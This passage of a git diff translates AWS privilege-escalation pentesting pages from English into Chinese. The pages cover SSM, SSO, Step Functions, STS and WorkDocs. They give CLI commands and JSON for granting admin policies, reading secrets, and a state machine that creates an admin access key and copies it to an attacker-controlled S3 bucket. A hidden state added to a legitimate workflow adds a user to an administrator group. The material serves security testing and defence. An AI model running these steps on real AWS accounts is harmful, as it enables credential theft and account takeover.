parameter called "id_rsa" aws ssm get-parameters --names id_rsa --with-decryption aws ssm get-parameter --name id_rsa --with-decryption ``` - -**Potential Impact:** Find sensitive information inside the parameters. +**潜在影响:** 在参数中找到敏感信息。 ### `ssm:ListCommands` -An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them. - +拥有此权限的攻击者可以列出所有发送的 **命令**,并希望在其中找到 **敏感信息**。 ``` aws ssm list-commands ``` - -**Potential Impact:** Find sensitive information inside the command lines. +**潜在影响:** 在命令行中查找敏感信息。 ### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`) -An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it. - +拥有这些权限的攻击者可以列出所有发送的 **命令** 并 **读取生成的输出**,希望能找到 **敏感信息**。 ```bash # You can use any of both options to get the command-id and instance id aws ssm list-commands @@ -118,19 +103,14 @@ aws ssm list-command-invocations aws ssm get-command-invocation --command-id --instance-id ``` - -**Potential Impact:** Find sensitive information inside the output of the command lines. +**潜在影响:** 在命令行输出中查找敏感信息。 ### Codebuild -You can also use SSM to get inside a codebuild project being built: +您还可以使用 SSM 进入正在构建的 codebuild 项目: {{#ref}} aws-codebuild-privesc.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md index 0fb4e10a1..d882ef897 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md @@ -4,58 +4,53 @@ ## AWS Identity Center / AWS SSO -For more information about AWS Identity Center / AWS SSO check: +有关 AWS Identity Center / AWS SSO 的更多信息,请查看: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} > [!WARNING] -> Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\ -> Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\ -> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) +> 请注意,**默认情况下**,只有来自 **管理账户** 的 **用户** 才能访问和 **控制 IAM Identity Center**。\ +> 其他账户的用户只能在该账户是 **委托管理员** 的情况下允许。\ +> [查看文档以获取更多信息。](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) -### ~~Reset Password~~ +### ~~重置密码~~ -An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email. +在这种情况下,提升权限的一个简单方法是拥有允许重置用户密码的权限。不幸的是,只能向用户发送电子邮件以重置其密码,因此您需要访问用户的电子邮件。 ### `identitystore:CreateGroupMembership` -With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has. - +拥有此权限后,可以将用户设置在组内,以便他将继承该组的所有权限。 ```bash aws identitystore create-group-membership --identity-store-id --group-id --member-id UserId= ``` - ### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control - +拥有此权限的攻击者可以向授予其控制下用户的权限集授予额外权限。 ```bash # Set an inline policy with admin privileges aws sso-admin put-inline-policy-to-permission-set --instance-arn --permission-set-arn --inline-policy file:///tmp/policy.yaml # Content of /tmp/policy.yaml { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Statement1", - "Effect": "Allow", - "Action": ["*"], - "Resource": ["*"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Statement1", +"Effect": "Allow", +"Action": ["*"], +"Resource": ["*"] +} +] } # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control - +拥有此权限的攻击者可以向其控制下的用户授予的权限集授予额外权限。 ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" @@ -63,14 +58,12 @@ aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control. +拥有此权限的攻击者可以向授予其控制下用户的权限集授予额外权限。 > [!WARNING] -> To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected. - +> 在这种情况下,滥用这些权限需要知道**在所有将受到影响的账户中存在的客户管理策略的名称**。 ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference @@ -78,59 +71,42 @@ aws sso-admin attach-customer-managed-policy-reference-to-permission-set --insta # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:CreateAccountAssignment` -An attacker with this permission could give a Permission Set to a user under his control to an account. - +拥有此权限的攻击者可以将权限集分配给其控制下的用户到一个账户。 ```bash aws sso-admin create-account-assignment --instance-arn --target-id --target-type AWS_ACCOUNT --permission-set-arn --principal-type USER --principal-id ``` - ### `sso:GetRoleCredentials` -Returns the STS short-term credentials for a given role name that is assigned to the user. - +返回分配给用户的给定角色名称的 STS 短期凭证。 ``` aws sso get-role-credentials --role-name --account-id --access-token ``` - -However, you need an access token that I'm not sure how to get (TODO). +然而,您需要一个我不确定如何获取的访问令牌(TODO)。 ### `sso:DetachManagedPolicyFromPermissionSet` -An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. - +拥有此权限的攻击者可以删除指定权限集与AWS托管策略之间的关联。通过**分离托管策略(拒绝策略)**,可以授予更多权限。 ```bash aws sso-admin detach-managed-policy-from-permission-set --instance-arn --permission-set-arn --managed-policy-arn ``` - ### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet` -An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. - +拥有此权限的攻击者可以删除指定权限集与客户管理策略之间的关联。通过**分离管理策略(拒绝策略)**,可以授予更多权限。 ```bash aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference ``` - ### `sso:DeleteInlinePolicyFromPermissionSet` -An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**. - +拥有此权限的攻击者可以从权限集的内联策略中删除权限。通过分离内联策略(拒绝策略),可以授予**更多权限**。 ```bash aws sso-admin delete-inline-policy-from-permission-set --instance-arn --permission-set-arn ``` - ### `sso:DeletePermissionBoundaryFromPermissionSet` -An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary. - +拥有此权限的攻击者可以从权限集删除权限边界。通过删除权限边界施加的限制,可以授予**更多权限**。 ```bash aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn --permission-set-arn ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md index bfc3adb77..3b3080999 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -4,7 +4,7 @@ ## Step Functions -For more information about this AWS service, check: +有关此 AWS 服务的更多信息,请查看: {{#ref}} ../aws-services/aws-stepfunctions-enum.md @@ -12,65 +12,58 @@ For more information about this AWS service, check: ### Task Resources -These privilege escalation techniques are going to require to use some AWS step function resources in order to perform the desired privilege escalation actions. +这些权限提升技术将需要使用一些 AWS 步骤函数资源,以执行所需的权限提升操作。 -In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in: +为了检查所有可能的操作,您可以登录自己的 AWS 账户,选择您想要使用的操作,并查看它所使用的参数,如下所示:
-Or you could also go to the API AWS documentation and check each action docs: +或者您也可以访问 API AWS 文档,查看每个操作的文档: - [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html) - [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html) ### `states:TestState` & `iam:PassRole` -An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation. - +拥有 **`states:TestState`** 和 **`iam:PassRole`** 权限的攻击者可以测试任何状态并将任何 IAM 角色传递给它,而无需创建或更新现有的状态机,从而可能使其他 AWS 服务的角色权限获得未经授权的访问。结合起来,这些权限可能导致广泛的未经授权的操作,从操纵工作流以更改数据到数据泄露、资源操纵和权限提升。 ```bash aws states test-state --definition --role-arn [--input ] [--inspection-level ] [--reveal-secrets | --no-reveal-secrets] ``` - -The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action: +以下示例展示了如何测试一个为 **`admin`** 用户创建访问密钥的状态,利用这些权限和 AWS 环境的宽松角色。这个宽松角色应该与任何高权限策略相关联(例如 **`arn:aws:iam::aws:policy/AdministratorAccess`**),允许该状态执行 **`iam:CreateAccessKey`** 操作: - **stateDefinition.json**: - ```json { - "Type": "Task", - "Parameters": { - "UserName": "admin" - }, - "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", - "End": true +"Type": "Task", +"Parameters": { +"UserName": "admin" +}, +"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", +"End": true } ``` - -- **Command** executed to perform the privesc: - +- **命令** 执行以进行权限提升: ```bash aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam:::role/PermissiveRole { - "output": "{ - \"AccessKey\":{ - \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\", - \"CreateDate\":\"2024-07-09T16:59:11Z\", - \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\", - \"Status\":\"Active\", - \"UserName\":\"admin\" - } - }", - "status": "SUCCEEDED" +"output": "{ +\"AccessKey\":{ +\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\", +\"CreateDate\":\"2024-07-09T16:59:11Z\", +\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\", +\"Status\":\"Active\", +\"UserName\":\"admin\" +} +}", +"status": "SUCCEEDED" } ``` - -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. +**潜在影响**:未经授权的工作流执行和操控以及对敏感资源的访问,可能导致重大的安全漏洞。 ### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`) -An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine. - +拥有 **`states:CreateStateMachine`** 和 **`iam:PassRole`** 的攻击者将能够创建状态机并为其提供任何 IAM 角色,从而使其能够未经授权地访问其他 AWS 服务的角色权限。与之前的权限提升技术 (**`states:TestState`** & **`iam:PassRole`**) 相比,这种技术本身并不执行,您还需要拥有 **`states:StartExecution`** 或 **`states:StartSyncExecution`** 权限 (**`states:StartSyncExecution`** 对于标准工作流 **不可用**,**仅适用于表达状态机**) 以便启动状态机的执行。 ```bash # Create a state machine aws states create-state-machine --name --definition --role-arn [--type ] [--logging-configuration ]\ @@ -82,176 +75,157 @@ aws states start-execution --state-machine-arn [--name ] [--input # Start a Synchronous Express state machine execution aws states start-sync-execution --state-machine-arn [--name ] [--input ] [--trace-header ] ``` - -The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions. +以下示例展示了如何创建一个状态机,该状态机为 **`admin`** 用户创建一个访问密钥,并将此访问密钥导出到攻击者控制的 S3 存储桶,利用这些权限和 AWS 环境的宽松角色。此宽松角色应与任何高权限策略相关联(例如 **`arn:aws:iam::aws:policy/AdministratorAccess`**),允许状态机执行 **`iam:CreateAccessKey`** 和 **`s3:putObject`** 操作。 - **stateMachineDefinition.json**: - ```json { - "Comment": "Malicious state machine to create IAM access key and upload to S3", - "StartAt": "CreateAccessKey", - "States": { - "CreateAccessKey": { - "Type": "Task", - "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", - "Parameters": { - "UserName": "admin" - }, - "ResultPath": "$.AccessKeyResult", - "Next": "PrepareS3PutObject" - }, - "PrepareS3PutObject": { - "Type": "Pass", - "Parameters": { - "Body.$": "$.AccessKeyResult.AccessKey", - "Bucket": "attacker-controlled-S3-bucket", - "Key": "AccessKey.json" - }, - "ResultPath": "$.S3PutObjectParams", - "Next": "PutObject" - }, - "PutObject": { - "Type": "Task", - "Resource": "arn:aws:states:::aws-sdk:s3:putObject", - "Parameters": { - "Body.$": "$.S3PutObjectParams.Body", - "Bucket.$": "$.S3PutObjectParams.Bucket", - "Key.$": "$.S3PutObjectParams.Key" - }, - "End": true - } - } +"Comment": "Malicious state machine to create IAM access key and upload to S3", +"StartAt": "CreateAccessKey", +"States": { +"CreateAccessKey": { +"Type": "Task", +"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", +"Parameters": { +"UserName": "admin" +}, +"ResultPath": "$.AccessKeyResult", +"Next": "PrepareS3PutObject" +}, +"PrepareS3PutObject": { +"Type": "Pass", +"Parameters": { +"Body.$": "$.AccessKeyResult.AccessKey", +"Bucket": "attacker-controlled-S3-bucket", +"Key": "AccessKey.json" +}, +"ResultPath": "$.S3PutObjectParams", +"Next": "PutObject" +}, +"PutObject": { +"Type": "Task", +"Resource": "arn:aws:states:::aws-sdk:s3:putObject", +"Parameters": { +"Body.$": "$.S3PutObjectParams.Body", +"Bucket.$": "$.S3PutObjectParams.Bucket", +"Key.$": "$.S3PutObjectParams.Key" +}, +"End": true +} +} } ``` - -- **Command** executed to **create the state machine**: - +- **命令** 执行以 **创建状态机**: ```bash aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole { - "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine", - "creationDate": "2024-07-09T20:29:35.381000+02:00" +"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine", +"creationDate": "2024-07-09T20:29:35.381000+02:00" } ``` - -- **Command** executed to **start an execution** of the previously created state machine: - +- **命令** 执行以 **启动之前创建的状态机的执行**: ```json aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine { - "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "startDate": "2024-07-09T20:33:35.466000+02:00" +"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"startDate": "2024-07-09T20:33:35.466000+02:00" } ``` - > [!WARNING] -> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account. +> 攻击者控制的 S3 存储桶应具有接受来自受害者账户的 s3:PutObject 操作的权限。 -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. +**潜在影响**:未经授权的工作流执行和操作以及对敏感资源的访问,可能导致重大安全漏洞。 -### `states:UpdateStateMachine` & (not always required) `iam:PassRole` +### `states:UpdateStateMachine` & (不总是需要) `iam:PassRole` -An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. +拥有 **`states:UpdateStateMachine`** 权限的攻击者将能够修改状态机的定义,能够添加额外的隐蔽状态,这可能导致特权提升。这样,当合法用户启动状态机的执行时,这个新的恶意隐蔽状态将被执行,特权提升将成功。 -Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations: - -1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough. -2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition. +根据与状态机关联的 IAM 角色的权限程度,攻击者将面临两种情况: +1. **宽松的 IAM 角色**:如果与状态机关联的 IAM 角色已经是宽松的(例如,附加了 **`arn:aws:iam::aws:policy/AdministratorAccess`** 策略),那么不需要 **`iam:PassRole`** 权限来提升特权,因为不需要更新 IAM 角色,仅状态机定义就足够。 +2. **不宽松的 IAM 角色**:与前一种情况相反,在这里攻击者还需要 **`iam:PassRole`** 权限,因为除了修改状态机定义外,还需要将一个宽松的 IAM 角色与状态机关联。 ```bash aws states update-state-machine --state-machine-arn [--definition ] [--role-arn ] [--logging-configuration ] \ [--tracing-configuration ] [--publish | --no-publish] [--version-description ] ``` - -The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. +以下示例展示了如何更新一个合法的状态机,该状态机仅调用一个 HelloWorld Lambda 函数,以添加一个额外的状态,将用户 **`unprivilegedUser`** 添加到 **`administrator`** IAM 组。这样,当合法用户启动更新后的状态机的执行时,这个新的恶意隐蔽状态将被执行,特权提升将成功。 > [!WARNING] -> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached). +> 如果状态机没有关联一个宽松的 IAM 角色,则还需要 **`iam:PassRole`** 权限来更新 IAM 角色,以便关联一个宽松的 IAM 角色(例如,附加了 **`arn:aws:iam::aws:policy/AdministratorAccess`** 策略的角色)。 {{#tabs }} {{#tab name="Legit State Machine" }} - ```json { - "Comment": "Hello world from Lambda state machine", - "StartAt": "Start PassState", - "States": { - "Start PassState": { - "Type": "Pass", - "Next": "LambdaInvoke" - }, - "LambdaInvoke": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" - }, - "Next": "End PassState" - }, - "End PassState": { - "Type": "Pass", - "End": true - } - } +"Comment": "Hello world from Lambda state machine", +"StartAt": "Start PassState", +"States": { +"Start PassState": { +"Type": "Pass", +"Next": "LambdaInvoke" +}, +"LambdaInvoke": { +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" +}, +"Next": "End PassState" +}, +"End PassState": { +"Type": "Pass", +"End": true +} +} } ``` - {{#endtab }} -{{#tab name="Malicious Updated State Machine" }} - +{{#tab name="恶意更新状态机" }} ```json { - "Comment": "Hello world from Lambda state machine", - "StartAt": "Start PassState", - "States": { - "Start PassState": { - "Type": "Pass", - "Next": "LambdaInvoke" - }, - "LambdaInvoke": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" - }, - "Next": "AddUserToGroup" - }, - "AddUserToGroup": { - "Type": "Task", - "Parameters": { - "GroupName": "administrator", - "UserName": "unprivilegedUser" - }, - "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup", - "Next": "End PassState" - }, - "End PassState": { - "Type": "Pass", - "End": true - } - } +"Comment": "Hello world from Lambda state machine", +"StartAt": "Start PassState", +"States": { +"Start PassState": { +"Type": "Pass", +"Next": "LambdaInvoke" +}, +"LambdaInvoke": { +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" +}, +"Next": "AddUserToGroup" +}, +"AddUserToGroup": { +"Type": "Task", +"Parameters": { +"GroupName": "administrator", +"UserName": "unprivilegedUser" +}, +"Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup", +"Next": "End PassState" +}, +"End PassState": { +"Type": "Pass", +"End": true +} +} } ``` - {{#endtab }} {{#endtabs }} -- **Command** executed to **update** **the legit state machine**: - +- **命令** 执行以 **更新** **合法状态机**: ```bash aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json { - "updateDate": "2024-07-10T20:07:10.294000+02:00", - "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +"updateDate": "2024-07-10T20:07:10.294000+02:00", +"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } ``` - -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. +**潜在影响**:未经授权的工作流执行和操控以及对敏感资源的访问,可能导致重大的安全漏洞。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md index 782bcc237..823107033 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md @@ -6,121 +6,101 @@ ### `sts:AssumeRole` -Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). - -For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. +每个角色都创建了一个 **角色信任策略**,该策略指示 **谁可以假设创建的角色**。如果来自 **同一账户** 的角色表示某个账户可以假设它,这意味着该账户将能够访问该角色(并可能进行 **privesc**)。 +例如,以下角色信任策略表明任何人都可以假设它,因此 **任何用户都将能够进行 privesc** 到与该角色相关的权限。 ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "sts:AssumeRole" +} +] } ``` - -You can impersonate a role running: - +您可以通过运行以下命令来模拟一个角色: ```bash aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname ``` - -**Potential Impact:** Privesc to the role. +**潜在影响:** 提权到角色。 > [!CAUTION] -> Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ -> With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. +> 请注意,在这种情况下,权限 `sts:AssumeRole` 需要在 **被滥用的角色中指明**,而不是在攻击者的策略中。\ +> 除此之外,为了 **从不同账户假设角色**,攻击者账户 **还需要** 对该角色拥有 **`sts:AssumeRole`** 权限。 ### **`sts:GetFederationToken`** -With this permission it's possible to generate credentials to impersonate any user: - +拥有此权限可以生成凭证以冒充任何用户: ```bash aws sts get-federation-token --name ``` - -This is how this permission can be given securely without giving access to impersonate other users: - +这是如何安全地授予此权限而不允许访问冒充其他用户的: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "VisualEditor0", - "Effect": "Allow", - "Action": "sts:GetFederationToken", - "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "VisualEditor0", +"Effect": "Allow", +"Action": "sts:GetFederationToken", +"Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" +} +] } ``` - ### `sts:AssumeRoleWithSAML` -A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** - -An example of a trust policy with this permission is: +一个包含此角色的信任策略授予**通过 SAML 认证的用户访问以假冒该角色的权限。** +具有此权限的信任策略示例如下: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "OneLogin", - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" - }, - "Action": "sts:AssumeRoleWithSAML", - "Condition": { - "StringEquals": { - "SAML:aud": "https://signin.aws.amazon.com/saml" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "OneLogin", +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" +}, +"Action": "sts:AssumeRoleWithSAML", +"Condition": { +"StringEquals": { +"SAML:aud": "https://signin.aws.amazon.com/saml" +} +} +} +] } ``` - -To generate credentials to impersonate the role in general you could use something like: - +要生成凭证以模拟角色,通常可以使用以下内容: ```bash aws sts assume-role-with-saml --role-arn --principal-arn ``` - -But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): - +但 **提供商** 可能有他们 **自己的工具** 来简化这一过程,比如 [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): ```bash onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 ``` - -**Potential Impact:** Privesc to the role. +**潜在影响:** 提升到角色。 ### `sts:AssumeRoleWithWebIdentity` -This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) - -For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: +此权限允许为**已在移动、Web 应用程序、EKS...中经过身份验证的用户**获取一组临时安全凭证,使用网络身份提供者。[在这里了解更多。](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) +例如,如果一个**EKS 服务账户**应该能够**模拟一个 IAM 角色**,它将在**`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`**中拥有一个令牌,并可以通过执行类似的操作**假设角色并获取凭证**: ```bash aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token # The role name can be found in the metadata of the configuration of the pod ``` - -### Federation Abuse +### 联邦滥用 {{#ref}} ../aws-basic-information/aws-federation-abuse.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md index 4b1e5e7e9..f1ddf608d 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md @@ -2,7 +2,7 @@ ## WorkDocs -For more info about WorkDocs check: +有关 WorkDocs 的更多信息,请查看: {{#ref}} ../aws-services/aws-directory-services-workdocs-enum.md @@ -10,17 +10,14 @@ For more info about WorkDocs check: ### `workdocs:CreateUser` -Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD: - +在指定的目录中创建一个用户,然后您将可以访问 WorkDocs 和 AD: ```bash # Create user (created inside the AD) aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password --email-address name@directory.domain --organization-id ``` - ### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)` -The files might contain sensitive information, read them: - +这些文件可能包含敏感信息,请阅读它们: ```bash # Get what was created in the directory aws workdocs describe-activities --organization-id @@ -31,26 +28,19 @@ aws workdocs describe-activities --user-id "S-1-5-21-377..." # Get file (a url to access with the content will be retreived) aws workdocs get-document --document-id ``` - ### `workdocs:AddResourcePermissions` -If you don't have access to read something, you can just grant it - +如果您没有权限读取某些内容,您可以直接授予它 ```bash # Add permission so anyway can see the file 